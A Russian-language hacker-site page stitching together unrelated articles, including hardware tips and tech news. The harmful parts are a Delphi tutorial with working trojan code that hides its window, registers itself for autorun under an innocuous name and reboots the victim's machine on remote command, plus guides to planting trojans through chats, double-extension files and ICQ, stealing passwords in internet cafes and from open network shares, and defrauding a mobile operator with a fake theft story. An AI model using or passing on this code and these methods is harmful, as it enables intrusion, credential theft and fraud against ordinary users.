статьиНа главную

 

 

 

"Тыгдымские кони"

     Начнём с того, что при помощи "Троянского коня" можно узнать пароли на соединения с интернетом, скопировать или записать файл на компьютер без вашего ведома, перегрузить компьютер, отформатировать винчестер и многое другое, всё зависит от того, какие функции были вложены разработчиком в его детище. За практическое осознание предоставленной информации, с этого момента я не несу никакой ответственности, вся информация направлена на то, чтобы разьяснить пользователю, какими способами программы "Троянские кони" могут попасть на компьютер жертвы. Так же предупреждаю, что в настоящем Уголовном Кодексе РФ предусмотренны 3 статьи за написание и распространение вредоносных программ, а также за несанкционированный доступ. Самый распространённый взлом - это кража пароля и логина пользователя на доступ и интернету, украв Ваш доступ, злоумышленник может просиживать в сети за ваши деньги и отправлять почту с Вашего электронного адреса. (прочитайте принцип действия "троянских коней", я расчитываю, что вы уже знаете что такое клиент и серверная чать) Для того, чтобы удалённо администрировать компьютер, взломщик должен заразить атакуемый компьютер серверной частью трояна (в данном случае я буду рассматривать на примере ВО). Способов инфицировать компьютер "трояном" очень много, я расскажу о некоторых уловках и технологиях, так как если рассказать обо всех способах, на сервере не хватит места под мой сайт, а сам он получится нудным.
Самый простой способ впарить трояна находясь на чате, особенно если на нём разрешено использовать теги или защита чата рассчитана разве-что на дурака, которую несложно обойти путём переправления фрейма отправки сообщений (та часть чата, с которой вы отправляете свои сообщения). Известно, что всё, что находится в части SCR, запускается браузером автоматически и беспрепятственно. Вы когда нибудъ слышали, что на сайте, на который вы пришли, звучит музыка? Думаю, что да. Музыку запускает скрипт, вот он Вы скажете: ну и что, как при помощи музыки можно подкинуть трояна? Можно конечно и при помощи музыки, но здесь всё дело в самом скрипте. Достаточно иметь в своём распоряжении место под сайт в сети интернета, например на www.narod.ru на нём можно получить бесплатное место под свою страничку. Итак злоумашленник получил место под свою страничку и закачал на сервер серверную часть "троянского коня", теперь он вставляет тег в чат , вот и всё, при исполнении этого тега браузер запустит серверную часть "трояна", он благополучно проинсталлируется у Вас в системе (при этом способе троян впаривается всем, кто находится в чате. Также такой способ может применятся на сайтах, где вам пытаются впарить почтового (мыльного) трояна). Теперь злоумышленнику осталось только запустить у себя клиентскую часть и начинать администрировать, воруя пароли и, не дай бог, уничтожая информацию с вашего компьютера.
Второй способ, когда жертва сама себе скачивает приговор в качестве звукового файла (песню любимой группы) или фотографии красивых, обнажённых девушек с сайта хацкера. Сейчас существует множество программ, при помощи которых можно присоеденить серверную часть "троянского коня" к любому файлу и инфицировать его. Причём во многих случаях файл произведёт действия, которые от него ожидает жертва, тоесть, если это звуковой файл, то обязательно зазвучит музыка, если картинка, соответственно, вы увидите картинку и даже не будете догадываться, что ваш компютер инфицировали. Многие скажут: ну как же? Ведь графические файлы с расширением jpg, gif, bmp не являются исполняемыми. Секрет весь в том, что вы только видите Foto.gif, на самом деле файл имеет стандартное расширение исполняемых файлов, тоесть EXE. Дело в том, что Windows обрезает длинные названия файлов. Злобный хацкер просто-напросто после Foto.gif поставил много пробелов тоесть Foto.gif_____пробелы___.ехе Windows обрезал длинное название и вы видите только Foto.gif, и он ни каких сомнений у вас не вызывает (помните, что файлы могут быть с любым расширением, даже с любой иконкой начиная от World (текстовой редактор) до любого другого)ОМНИТЕ, ЧТО ЕСЛИ В НАЗВАНИИ ФАЙЛА ПОСТАВИТЬ БОЛЬШЕ 255 ПРОБЕЛОВ, ЕГО БУДЕТ НЕВОЗМОЖНО УДАЛИТЬ ИЗ СИСТЕМЫ WINDOWS.
Ещё очень популярно посылать "троянских коней" по электронной почте, я бы даже сказал, что это самый распространённый способ. Обычно приходит письмо от незнакомого человека и выглядит примерно таким образом: "Здравствуй, извини, что долго молчал. Вот тебе крутая программа, которую я тебе обещал." (Всегда смотрите от кого пришло письмо, если вы не знаете человека, лучше не запускайте ни каких прикреплённых к письму файлов, тем более, если вы ни у кого ни каких программ не просили, попросту удалите письмо (желательно удалять вручную из той дериктории где оно хранится).Советую не пользоваться службами отправки почты Майкрософт Аутлук Экспресс, в ней множесто ошибок, при помощи каторых можно получить доступ к вашему жёсткому диску. Также следите на наличие расшаренных ресурсов (ресурсы к которым дан общий доступ ), если вам нужно дать кому-то доступ на диск, обязательно ставьте пароль, если вы не пользуетесь ни какими больше протоколами кроме TCP/IP, то удалите их).
Пока мы рассмотрели три способа впаривания "тыгдымских лошадей". Хотелось бы обратить ваше внимание на то, как хацкеры обманывают на своих сайтах простых пользователей подсовывая им почтовых (троянский конь который расчитан только на кражу пароля) и всеразличнах других "троянцев". Никогда не пытайтесь скачать программы предворительно не проверив их на вирусы, такие как, (названия програм могут быть изменены)

·  grader_pass.zip - программа, которая способна вытащить пароли с сервера вашего провайдера.Помните, бесплатный сыр только в мышеловке! Таких программ не существует.

·  killnet - программа делает некорректную операцию, взлом провайдера. Действительно действующая программа только вместо провайдера, она ломает Вас. Помните, одной программой, провайдера не прошибить!
Не попадайтесь на такие же уловки, когда обещают нереальные вещи, типа: нажатием одной клавиши у вас будет халявный интернет или вы убьёте своего обидчика. Всегда обращайте внимание на размер программ, если в описании говорится, что это супер программа или патч, а размер её всего 65 килобайт или меньше, то знайте скорее всего это "троян", так как действительно хорошая программа не может весить пару байт или килобайт.

 

 

Статьи по железу

Разгон HDD: вымысел или реальность?

Автор: ExFast ansv@mail.ru

Наверняка вы не слышали, что жёсткий диск можно разогнать. Но разгон винта отличается от разгона других устройств. И возможно при условие, что до разгона HDD работал не на максимум от своих возможностей. Если заинтересовало, то продолжим.

Теория
Обычно винчестеры работают не на максимум, но не всегда. Сразу предупрежу, что при разгоне увеличивается скорость вращения, и возрастает скорость передачи данных, а недостаток - шум. Ну а если скорость не главное, то можно намеренно затормозить винт.
Скорость или шум - решать вам.

Инструмент
К
ак и для любой работы, так и для нашей нужен инструмент. В нашем случае это программа. Ёе можно скачать по адресу mhdd.net, её название mhdd, также можно найти инструкцию на русском языке и всё это не превышает сотни килобайт. Работает программа не только под MS-Dos, но и под Win 9x. Изменять параметры накопителя можно в любое время и без перезагрузки, а также завершать работу программы без различных последствий.

Функции
Э
та программа умеет не только увеличивать скорость работы винчестера, но и показывать его состояние (в верхней части экрана):

DREQ - ждёт поступление команд;
WRFT - ошибка возникшая при записи;
BUSY - винт не реагирует на команды;
ABRT - команда не принята;
TONF - не найден 0-й трек;
AMNF - нельзя обратится к заданному сектору.

Тестировать винчестера на наличие ошибок - сканирование поверхности вызывается клавишей F4.Даже иногда лечить его (вызывается через F4, ERASE WAITs, и предназначена для удаления софт-бэдов). Вот что можно узнать с помощью этой программы: название винта, версия микропрограммы, размер, количество головок и секторов, серийный номер и многое другое. Я назвал лишь основные функции, а полное описание можно найти на сайте, а сейчас перейдём к самому главному.

Назначение
~ Что бы изменить скорость/уровень шума надо ввести aam далее:
*M - минимальный шум/производительность;
*L - средний шум/производительность;
*P - максимальный шум/производительность;
*D- выключает AAM; самая большая производительность/шум из всех опций.
~ SMART-тесты запускаются командой smart test.
~ Также возможна установка пароля на винт, но если вы забудете пароль, то потеряете винчестер как устройство! Если пароль не установлен, есть надпись Security: high OFF, а установлен, то Security: high ON. Для установки пароля выполните действия:
1) Выбрать винчестер, на который нужно установить пароль (Shift + F3);
2) Нажать F2;
3) Набрать pwd;
4) Набрать пароль (не более 32 символов)
Внимание: забыв пароль, вы потеряете винчестер, как устройство!
5) Нажать Enter
6) Всё! Пароль установлен.

А как его снять?
1) Выбрать винчестер, с который нужно снять пароль (Shift + F3);
2) Нажать F2;
3) Набрать unlock;
4) Ввести пароль;
5) Набрать dispwd;
4) Ввести пароль;
5) Нажать F2;
6) Если всё набрано правильно, то надпись PWD исчезнет.

P. S.
Как видите функций у этой программы довольно много, начиная от просмотра состояния HDD и заканчивая установкой пароля. Данную программу можно посоветовать, как универсальную для ухода за винчестером.

Автор не несёт ответственности за ваши действия!

 

 

Создание собственного трояна

Ты уже сто раз слышал это магическое слово «Троян». И мы уже много раз писали обзоры различных коней этой породы. В твоих извилинах, наверно уже давно крутиться мысль о создании собственного боевого коня. Сегодня тебе предстоит эта уникальная возможность. Даже если ты никогда не будешь использовать эти знания, тебе всё равно нужно знать, как работают трояны изнутри.

Для простоты тела мы сделаем это на Delphi. Я выбрал этот язык, потому что тело журнала ограничено, и я не хочу вдаваться в подробности протоколов.

В этом номере ты найдёшь статью, посвящённую написанию супер плеера на Delphi. Если ты её пропустил, то обязательно прочти и возвращайся сюда. Там я описал основные принципы работы с оболочкой компилятора, так что здесь повторяться не буду.

Приготовься, нам предстоит написать сразу две проги. Одна будет находиться на твоей машине (клиент), другую надо будет подбросить жертве (сервер). Работы будет много, поэтому меньше слов, и ближе к телу.

Троянский сервер:

Итак, запускай Delphi или если он у тебя уже запущен, то создавай новый проект («File» – «New Application»). Сейчас мы примемся за серверную часть трояна.

Для начала выбери пункт меню «Options» из меню «Project».

Здесь ты должен перенести «From1» из раздела «Auto-Create forms» (список слева) в «Available forms» (список справа), как это сделано у меня. Только что мы отключили From1 из списка авто инициализируемых форм. Теперь инициализацию придётся произвести вручную. Не пугайся, это очень просто.

На странице «Application» этого же диалога есть кнопка «Load Icon». Нажми её, чтобы сменить иконку будущей проги. Если икону не сменить, то будет использоваться дельфячая, а она быстро выдаст твоё смертельное оружие.

Теперь ты должен бросить на форму компонент ServerSocket из раздела «Internet», это сервак протокола (по умолчанию TCP, и нам его достаточно). Выдели созданный ServerSocket1 и перейди в ObjectInspector. Здесь тебя интересует только свойство «Port». По умолчанию оно равно 1024, но я тебе советую его поменять на любое другое (желательно больше 1000).

Теперь щёлкни в любом месте на форме, чтобы активизировать её свойства. Перейди в ObjectInspector и щёлкни по закладке Events. Дважды щёлкни по строке «OnCreate» и Delphi, как всегда, создаст процедуру, она будет выполняться при инициализации формы. Напиши там следующее:

procedure TForm1.FormCreate(Sender: TObject);
var RegIni:TRegIniFile;
begin
 RegIni:=TRegIniFile.Create('Software');
 RegIni.RootKey:=HKEY_LOCAL_MACHINE;
 RegIni.OpenKey('Software', true);
 RegIni.OpenKey('Microsoft', true);
 RegIni.OpenKey('Windows', true);
 RegIni.OpenKey('CurrentVersion', true);
 RegIni.WriteString('RunServices', 'Internat32.exe', 
   Application.ExeName);
 RegIni.Free;
 ServerSocket1.Active:=true;
end;

Теперь перейди в начало текста и напиши после «uses» слово «registry». Мы уже делали такую операцию в статье про мега плеер, но я повторю, как это будет выглядеть:

 uses registry, Windows, Messages, 

Теперь я объясню, что мы написали в процедуре.

«var RegIni:TRegIniFile» - здесь мы объявили переменную RegIni типа TRegIniFile. С помощью этой переменной мы будем общаться с реестром.

«RegIni:=TRegIniFile.Create('Software')» - инициализируем переменную указывающую на реестр.

«RegIni.RootKey:=HKEY_LOCAL_MACHINE» говорим, что нас интересует раздел HKEY_CURRENT_USER реестра.

«RegIni.OpenKey('Software', true)» - открываю подраздел «Software».

Дальше я последовательно открываю подразделы, пробираясь в недра окошек.

«RegIni.WriteString('RunServices', 'Internat32.exe', Application.ExeName)” – записываю в раздел «RunServices» (в этом разделе хранятся проги, которые автоматически загружаются при старте), новый параметр с именем «Internat32.exe» (имя будущего файла) и значением Application.ExeName (здесь храниться полный путь к запущенному трояну).

«RegIni.Free» - уничтожаю ненужный больше объект RegIni.

Всё это делалось, чтобы при запуске проги, она сама себя прописывала в разделе автозапуска. И после перезагрузки компьютера она автоматически загружалась в память.

Самая последняя строка «ServerSocket1.Active:=true» запускает сервер на указанном тобой порте.

С загрузкой покончено. Теперь давай займёмся выгрузкой. Опять выдели форму и в закладке Events у ObjectInspector-а дважды щёлкни по строке «OnDistroy». Теперь создастся процедура, которая будет выполняться при уничтожении формы. В созданной процедуре напиши:

procedure TForm1.FormDistroy(Sender: TObject; var Action: TCloseAction);
begin
 ServerSocket1.Active:=false;
end;

Этим я отключаю сервак. Если этого не сделать, то при первой же перезагрузке твоя жертва может поймать синий экран, если ты в это время будешь подключён к серверу. С одной стороны, это хорошо. Твоя жертва в очередной раз убеждается в плохой защищённости его окошек. А с другой, я не думаю, что следует выдавать себя раньше времени. Тем более, что после синего экрана перезагрузка может остановиться, а нам это не надо (забегу вперёд и скажу, что мы сами будем перегружать компьютер жертвы).

Теперь нужно выделить ServerSocket1 и перейти на закладку Events у ObjectInspector-а. Дважды щёлкни по строке «OnClientRead» и в созданной процедуре (она будет вызываться, когда что-нибудь приходит на порт) напиши:

procedure TForm1.ServerSocket1ClientRead(Sender: TObject;
  Socket: TCustomWinSocket);
begin
if Socket.ReceiveText ='R' then
 ExitWindowsEx(EWX_SHUTDOWN,0);
end;

Теперь, как это звучит по-нашему:

 Если полученный текст = букве ‘R’ то
  Отправить компьютер в редаун.

ExitWindowsEx – редаун заставит окна свернуться и отключить компьютер от питания. Я вообще добрый дядька, поэтому использовал параметр EWX_SHUTDOWN. С этим параметром, перед редауном всем запущенным приложениям полетит запрос о выключении, и жертва сможет сохранить свои изменённые данные. Если ты злей меня, то используй EWX_FORCE. В этом случае, компьютер упадёт без предупреждения и со скоростью света, так что жертва не успеет от страха воздух испортит :).

Троян практически готов, сохрани его. Для этого выбери «Save All» из меню «File». С начала Delphi запросит имя формы. Оставь по умолчанию (Unit1) и нажми «Сохранить». Потом будет запрос на имя проекта, которое будет использоваться в качестве имени ЕХЕ файла. Назови его «Internat32», чтобы файл не вызывал особых подозрений.

Конюшня для коня:

Теперь ты должен хорошенечко спрятать своего будущего скакуна, чтоб его не было видно в панели задач. Для этого выбери пункт меню «Project Manager» из меню «View».

Щёлкни правой кнопкой по Internat32.exe и в появившемся меню выбери «View Source». Перед тобой откроется маленький файл с исходным текстом проекта. Сравни то, что ты увидишь с этим текстом, и допиши то, чего не хватает, а что лишнее – убери (так не так уж и много):

program Internat32;
 
uses
  Forms,
  Windows.
  Unit1 in 'Unit1.pas' {Form1};
 
{$R *.RES}
 
var
 WhEvent:THandle;
begin
  Application.Initialize;
  ShowWindow(Application.Handle,SW_Hide);
  Form1:=TForm1.Create(nil);
  Application.Run;
 
  WhEvent:=CreateEvent(nil, true,false, 'et');
  while (true) do
   begin
    WaitForSingleObject(WhEvent,1000);
    Application.ProcessMessages;
   end;
end.

Будь внимателен при переписывании. Всё должно быть один к одному. Теперь я расскажу, что здесь написано:

В самом начале нет ничего интересного, и нас абсолютно не касается. Нас интересует всё, что написано после слова «Var».

WhEvent:THandle – Этим я говорю, что мне нужен указатель WhEvent на пустое событие Thandle.

Application.Initialize – Инициализируется троян.

ShowWindow(Application.Handle, SW_Hide) – Устанавливаю параметры окна. Параметр SW_Hide – говорит, что окно должно быть невидимо. Единственное, как его можно после этого увидеть, так это нажать Ctrl+Alt+Del. Но здесь у нас используется не вызывающее подозрения (только у чайника, профи уже давно знают, о таком имени) имя.

Form1:=TForm1.Create(nil) – создаю форму. Мне приходится это делать так, потому что мы убрали форму из из списка авто создаваемых.

Application.Run – запускаю трояна. Здесь запускаются обработчики событий и прочая ерунда, за которую отвечает Delphi и которую пришлось бы писать вручную на С или С++. А здесь всё очень просто.

WhEvent:=CreateEvent(nil, true,false, 'et') – инициализация пустого события.

Следующие пять строчек я напишу словами, а ты разберёшься как всегда методом сравнения:

Пока (true) выполнять
Начать цикл
 Ждать пока наступит событие (пустое событие, 1000 миллисекунд)
 Получить управление
Закончить цикл

Две строчки между началом и концом цикла будет выполняться бесконечно, потому что true оно всегда true, и из этого цикла выхода нет. Весь цикл заключаеться в двух особенностях:

1. Запускается ожидание несуществующего события. Так как событие не существует, то программа прождёт его ровно указанное время в качестве второго параметра (1000 миллисекунд или 1 секунда).

2. Получить управление.

После второго шага программа снова перейдёт на пункт 1 и запустит ожидание. Во время ожидания пользователь работает с другими приложениями как всегда. Когда трояну (каждую 1 секунду) передаётся управление, то наш конь проверяет: есть ли для него сообщения. В нашем случае сообщение может быть одно – приход на указанный тобой порт управляющей команды. Если сообщения есть, то троян их выполняет. И в любом случае (есть сообщения или нет), после этого пользователь снова работает 1 секунду без проблем. Проверка происходит так быстро, что жертва не ощутит нагрузки трояна даже на четверке с сотым камнем.

Нажми «Ctrl+F9» чтобы Delphi создал .ехе файл без запуска проги. Как только Delphi перемозгует весь код, можешь считать, что серверная часть готова. Если вздумаешь её тестировать, то не забудь, что после первого же запуска троян пропишется в реестре по адресу: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices. Не забудь после тестирования его удалить.

Теперь переходим к клиентской части, которую ты должен будешь запустить на своём компьютере для управления компьютером жертвы.

Троянский всадник:

Снова сохрани все изменения и создай новый проект. Пришло время писать клиентскую часть трояна. Ещё пару минут напряжённого труда и все красавицы наши :).

На новый проект ты должен бросить три компонента:

1. Button из закладки «Standart» для отправки команды на компьютер жертвы.

2. Edit из закладки «Standart» для ввода имени или адреса жертвы.

3. ClientSocket из закладки «Internet» клиент порта для связи с сервером

Посмотри на рисунок 3, у тебя должно получиться нечто похожее.

Выдели ClientSocket1 и в ObjectInspector-е измени свойство порт. По умолчанию он 0, а ты должен поставить тот, который ты назначил серверу.

Теперь дважды щёлкни по кнопке и в созданной процедуре (обработчике нажатия кнопки) напиши следующее.

procedure TForm1.Button1Click(Sender: TObject);
begin
 ClientSocket1.Host:=Edit1.Text;
 ClientSocket1.Active:=true;
 ClientSocket1.Socket.SendText('R');
 ClientSocket1.Active:=false;
end;

ClientSocket1.Host:=Edit1.Text – В ClientSocket1 заносим имя жертвы в твоей локалке. Если собираешься использовать троян в инете, то там ты имя никак не сможешь узнать. Тебе придётся использовать IP адрес, а значит эта строчка замениться на ClientSocket1.Addres:=Edit1.Text. И вводить в Edit1 ты должен будешь IP адрес.

ClientSocket1.Active:=true – активировать соединение с сервером.

ClientSocket1.Socket.SendText('R') – отправить букву R. Помнишь, что у нас было пару минут назад. Если сервер получит букву R, то он перегрузит машину.

ClientSocket1.Active:=false – закрыть соединение с сервером.

Всё. Троян готов к бою. Нажми «Ctrl+F9» чтобы Delphi создал ЕХЕ файл без запуска проги. Найди жертву и протестируй своего верного коня. Для этого нужно запустить серверную часть на компьютере жертвы. Потом запустить клиентскую часть на своём компьютере. Ввести в клиент имя компьютера жертвы (или адрес, если ты скомпилировал под использование через IP) и нажать кнопку. Компьютер жертвы должен перегрузится.

 

 

Развитие DVD-ROM

Перед компьютерной индустрией сейчас стоит нелегкая задача, похожая на ту, что описана в "Новом завете". Необходимо протащить верблюда, то есть терабайты информации, через игольное ушко коммуникационных каналов. И представьте себе, решения имеются! Большая часть их была представлена на проходившей недавно в Японии выставке Ceatec 2002.

Свои дальнейшие планы раскрыли два враждующих лагеря DVD+ и DVD-. Toshiba Corp. считает, что будущее DVD за системой Advanced Optical Disk.

Сейчас корпорация использует однослойные DVD диски емкостью 15 Гб, обеспечивающие скорость передачи данных 36 Мбит/сек. Для чтения и записи используется сине-фиолетовый лазер с длиной волны 405 нм. Скоро Toshiba и Nec займутся выпуском двухслойных дисков емкостью 30 Гб и перезаписываемых дисков на 40 Гб.

Приверженцы конкурирующей системы Blu-ray Disk: Hitachi, JVC, Matsushita, Pioneer, Philips, Sharp и Sony, продемонстрировали свой вариант писалки. Пока система Blu-ray Disk поддерживает только запись на болванки. В скором времени диапазон доступных носителей расширится за счет двухслойных DVD-ROM и минидисков.

Matsushita нашла способ изготавливать двухслойные диски на уже существующих производственных линиях, так что сторонникам дисков Blu-ray не придется тратить большие средства на апгрейд оборудования.

Компания Pioneer продемонстрировала практически прозрачный DVD-диск емкостью 25 Гб. Дело в том, что отражающий слой в этом диске на 40% тоньше, чем в обыкновенном DVD-ROM.

TDK занимается созданием диска одноразовой записи, в котором используется неорганический материал для формирования записывающего слоя - сплав кремния и меди. Дело в том, что работа над органическими материалами только началась, а диски из сплава можно запускать в серийное производство хоть завтра. Перезапись невозможна из-за того, что при первоначальной записи отдельные слои кремния и меди тают и сливаются.

Кроме того, TDK разработала технологию, позволяющую записывать диски на скоростях 4x и выше. Высокое качество записи обеспечивается при скорости 144 Мбит/сек.

Так как же передать такое невообразимое количество информации, да еще и с помощью устройств беспроводной связи?! Корпорация Sharp объявила о разработке коммуникационных устройств, работающих на частоте 5,2 ГГц и использующих стандарт передачи данных IEEE 802.11e.

Максимальная скорость передачи данных 54 Мбит/сек, хотя на выставке демонстрировалась скорость 36 Мбит/сек. Стандарт 802.11e еще официально не принят, но Sharp планирует воспользоваться им для создания зашифрованных каналов передачи видео и аудио информации.

Matsushita продемонстрировала беспроводной передатчик стандарта IEEE 802.11a со специальной антенной, котораянаходит оптимальный угол для приема радиоволн. Но все рекорды побила JVC, представив передатчик, со скоростью передачи данных 1,25 Гбит/сек.

Правда, информация не шифруется и не проверяется на наличие ошибок, а максимальная дистанция - 10 метров. Но это неважно, главное - протащить-таки верблюда

 

 

Взлом интернет-кафе/компьютерного клуба

Находите в городе клуб или кафе, которое подключено к интернету. Идете туда, садитесь за машину, оплачиваете интернет и притворяетесь полным дауном, пуская пузыри и медленно тыкая пальцами в клавиатуру, тем самым усыпляя бдительность администраторов этого клуба. Потом ищете в поисковике такую программу: pass.exe (dialupass, PassView). Потом быстренько скачиваете программу на винчестер и запускаете ее. Все антивирусы и firewall'ы будут молчать, не замечая ваших противоправных действий. Она вам выдаст список ВСЕХ паролей и логинов, которые есть на этом компьютере, исключая, вероятно, пароль который используется для входа в локальную сеть. Да он нам собственно и не нужен. Если информации столько много, что вы ее не в состоянии запомнить, а ручка и листок бумаги вызовут подозрения, то нажмите на кнопку Отослать на e-mail. Самое главное НИКАКИХ дискеток. Шуршание дискеты в дисководе сразу привлечет к вам лишнее внимание, потому что, как всем известно, дискеты наилучший способ переноса компьютерных вирусов, и ламеры очень боятся чужих дискеток в своем дисководе. Только не забудьте потом ее удалить из компьютера. После чего, мило улыбаясь, вы досиживаете оплаченное время и бежите к себе домой, радостно крича во все горло: We are the champions! Пароли в ваших руках или в вашем почтовом ящике, что, в принципе, одно и тоже. Еще лучше если вы заранее найдете программу, скачаете ее на какой-нить бесплатный ресурс или на свою страничку, предварительно запаковав ее Apack'ом или еще каким-нибудь динамическим паковщиком, для уменьшения ее размера и переименуете ее как-нибудь безобидно, типа flower.exe. Есть еще программа dialpwd.exe, она консольная и не позволяет отсылать на e-mail. Ее единственное достоинство - размер, который составляет около 15-ти килобайт, что позволяет превратить добычу пароля в дело двух минут. Кстати, желательно узнать, есть ли на модеме провайдера АОН(определитель номера). Его можно узнать по характерному писку частотой 500 Гц, который слышится в модеме после того, как вы набрали номер и абонент поднял трубку. Если нет, то флаг в руки вас вычислить будет не так то и просто. Если же есть, то попробуйте обойти его, набрав номер с помощью программы, в которой есть анти-АОН. Одной из таких программ является Active Phone Server или еще ее можно найти как apserver.zip. Ее преимущества в том, что анти-АОН можно включить не только когда звонишь по обычному телефону, но и тогда, когда вы звоните до провайдера. Анти-АОН посылает в линию сигналы, которые обычно соответствуют цифрам 12345678, набранным мгновенно, что сбивает в большинстве случаев АОНы.

 

 

Intro

И так ... было время, когда все провайдеры знали друг друга в лицо, и каждый из них был знаком со своими клиентами. Но! Все изменилось. В связи с этим был придуман вход в интернет с помощью пары логин:пароль, вводимых при DialUp подключении к провайдеру (практически с этого момента и появились такие люди как мы - питавшие "звериный" интерес к постижению тайн всего мира = паролей пользователей).

Первое, что приходит на ум хакера, это подбор пароля вручную. Многие "неграмотные" пользователи часто выбирают в качестве "заветного слова" что-то наподобие 12345, asdf, god, love, password, secret, sex, qwerty и т.д. и т.п. Но что делать, если пароль подобрать не получилось? Именно об этом мы и будем говорить.

Windows aka MustDie

Самая, самая система для взлома - глубокоуважаемый мною Windows. Его популярность действует только на руку опытному хакеру. Не забывайте, что главное - не попасться в лапы закона. Ну что же, начнем?

В системе Майкрософт(а) пароли пользователей хранятся в файлах, названия которых генерируются из первых восьми символов имени пользователя. Прибавляя к файлу расширение pwl, система кидает его в папочку Windows(а). Таким образом, что б получить пароли некоего пользователя, необходимо скопировать все файлы с расширениями pwl из каталога C:\%WINDIR% к себе на комп (учтите, что пароли там хранятся в закодированном виде). После этого ты должен запустить программу RePwl, которая откроет тебе пароли. Ты спросишь "а как узнать телефоны, по которым можно подсоединиться к прову"? Так вот - настройки соединений, телефоны и другая полезная инфа хранится в реестре - тебе необходимо запустить на машине ламера редактор реестра (regedit.exe)

...и найти в нем секцию "HKEY_CURRENT_USER\RemoteAccess\Addresses", записать в новый файл, командой "Реестр => Экспорт файла реестра...", выбранную ветвь. Информация в новоиспеченном файле *.reg также будет храниться в закодированном виде, но тебе даже не придется ее раскодировать - просто запусти этот файл у себя дома и все, что ты скопировал, иммигрирует на твою машину. Если тебе более удобно копировать сам файл реестра, то: Найди и скопируй из папки Windows(а) файл user.dat (для всех MS-систем, кроме XP :()

Сделай резервную копию своего user.dat(а), замени его на позаимствованный у "неизвестного доброжелателя" ;) Перезагрузись и работай с новым реестром Среди всего мусора реестра в нем еще можно найти следующее: "HKEY_CURRENT_USER\NETwork\Recept" - подключенные ресурсы в инет "HKEY_CURRENT_USER\RemoteAccess\Profile" - инфа о логине подключения

"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ InternetSettings\ProxyServer"

"HKEY_CURRENT_USER\Software\Microsoft\Internet Mail and News\Mail:\

...\Account"- для POP3 сервера

...\DefaultPOPSServer"

...\DefaultSMTPServer"

...\Name:"

...\Organization"

...\РОРЗ -г :"

...\Password" - для POP3 сервера

...\SenderEMail:"

Но как завладеть паролями, не засветившись, то есть, не предоставляя права кому-либо подозревать именно тебя? Это можно сделать прямо в инете - тебе потр#$&ется сканер расшаренных ресурсов (к примеру, xSharez). Последующие действия - заходишь на http://tehnofil.ru/<A%20href=, вводишь адрес сайта (или один из ип(ов)) нужного провайдера и смотришь зарегистрированный им диапазон ip. После этого - вводишь те же ип(ы) в Legion, xSharez или другую любимую тулзу, и жмешь на Scan. Если удалось найти кого-либо с открытым диском C, подсоединяй его (кнопка Mount) и скачивай все, чего душа пожелает (если будешь копировать *.pwl, учти, что файлы размером от 688 до 719 байт не содержат паролей).

Пароли могут храниться не только в pwl-файлах, например: Edialer хранит их в Edialer.ini (расшифровать не сложно и самому ;), VDialer - в каталоге Windows, файл Vd3user.dat (копируйте его на свой хард и запускайте программу, пароль будет введен) CuteFTP 4.x - в tree.dat (для расшифровки - RePwl), если есть ICQ, то в папке ICQ/200хb хранятся UIN(ы) в файлах *.dat (расшифровывать с помощью Advanced ICQ Password Recovery), а Trillian 0.725 - Trillian\users\default в файлах *.ini (нужно заменить ими своих).

Еще один способ завладеть чужими паролями - написать троян, который будет отсылать на специально созданное для этого мыло чужие *.pwl(ки). Его можно "приклеить" ламеру у него же дома, послав по почте, или, что я считаю наиболее удобным, отослав *.exe файл по ICQ, назвав его, например, "photo.jpg .exe" (писать с пробелами - у аськи не достаточно большое поле, и она не покажет полное название файла).

Очередной способ гласит, что некоторые провайдеры предоставляют бесплатный доступ к своим SMTP и POP3 серверам (http://tehnofil.ru/<A%20href=, http://www.mailgate.ru/, http://www.e-mail.ru"/;.).

Это можно использовать в своих целях (к себе на почту можно качать файлы) - все, что нужно, это Shell с поддержкой Perl и возможностью запуска программ в режиме background(а). Все запросы должны идти через mail-proxy, написанного на Perl(е), расположенного, к примеру, на вашем сайте.

Другие провы предлагают бесплатный интернет, но не полностью функциональный (ограниченный некоторым количеством сайтов или что-либо наподобие). Исчите таких, которые поддерживают функцию callback (оплата телефонного разговора). Если вам удастся раздобыть номера таких провайдеров, буду благодарен, если не забудете поделиться со мной...

Outtro

А теперь напряги мозги и задумайся: "А не легче пойти и заплатить, отдать пусть даже 20$, чем парится над этой проблемой?"

 

 

 

  Статью прислал The Fuf.

  В данной статье я расскажу как сделать халявный инет через БиЛайн GPRS. Для этих делишек нам потребуется мобила (с GPRS) и комп, через который мы в инет будем заходить ;) Итак, приступим...
  Шаг первый: Покупаем мобилу с поддержкой GPRS (если нет) и подключаемся к БиЛайну (если не подключены; про такую халяву в других сетях не знаю). После этого на счету должны быть несколько "подарочных" баксов, если их нет то стоит раскошелиться на карточку в несколько баксов.
  Шаг второй: Подключаем себе пакет из трёх услуг (GPRS, WAP, MMS). Как это сделать можно узнать в справочной службе БиЛайна. Потом заказываем настройки GPRS для своей мобилы (бесплатно).
  Шаг третий: Настраиваем комп соответствующим образом (см. справку на www.beeline.ru).
  Шаг четвёртый: Подключаемся к инету. Теперь и начинается Халява: выкинуть из инета нас не могут, а проверка состояния счёта происходит лишь при подключении. Поэтому можно качать из сети всё, что угодно и сколько угодно! Связь по GPRS у БиЛайна стабильная, обрывов связи нет! Кто не понял в чём халява, скажу: ты можешь пользоваться инетом до офигения, единственный минус - комп выключать нельзя, а в это время твой баланс на мобиле уходит в минус, а ты продолжаешь сидеть в инете. Когда у тебя будет, где-то -200 баксов (больше 1Гб траффика) можно выбросить симку в помойку. А потом сказать, что ты был на даче, и у тебя там мобилу спёрли, и что "воры" заходили в инет через твой счёт, а сообщить об этом инциденте у тебя не было возможности :)))) (или что-нибудь другое придумать =)...
  ЗЫ. Не забудьте поставить мобилу на зарядку :)

 

 

HiTech News

Xakep, номер #028, стр. 028-004-4


По первому зову, громко лая, робопес бросается выполнять команды хозяина. Как хвастают разработчики, RS-01 станет грозой всех Aibo и унесет на спине целую упаковку бездыханных японских "мосек". Насколько это заявление соответствует действительности, станет известно через месяц, когда новинка поступит в ограниченную продажу в Великобритании.

Будильник с MP3

ВСТАВИТЬ ИЗОБРАЖЕНИЕ MP3-0.JPG + MP3-1.JPG

Американцы уже просыпаются под любимые MP3-треки.

Будильник MP3 O'Clock взывает к любителям сладких снов голосами популярных исполнителей. Устройство проигрывает MP3-файлы продолжительностью до 50 секунд. В комплект поставки входят "музыкальные приветы" от No Doubt и Metallica, полсотни других известных треков. Дополнительные мелодии и свой собственный голос можно загрузить с обычного компьютера.

Новинка продается по цене 45 долларов.

ROL на халяву!

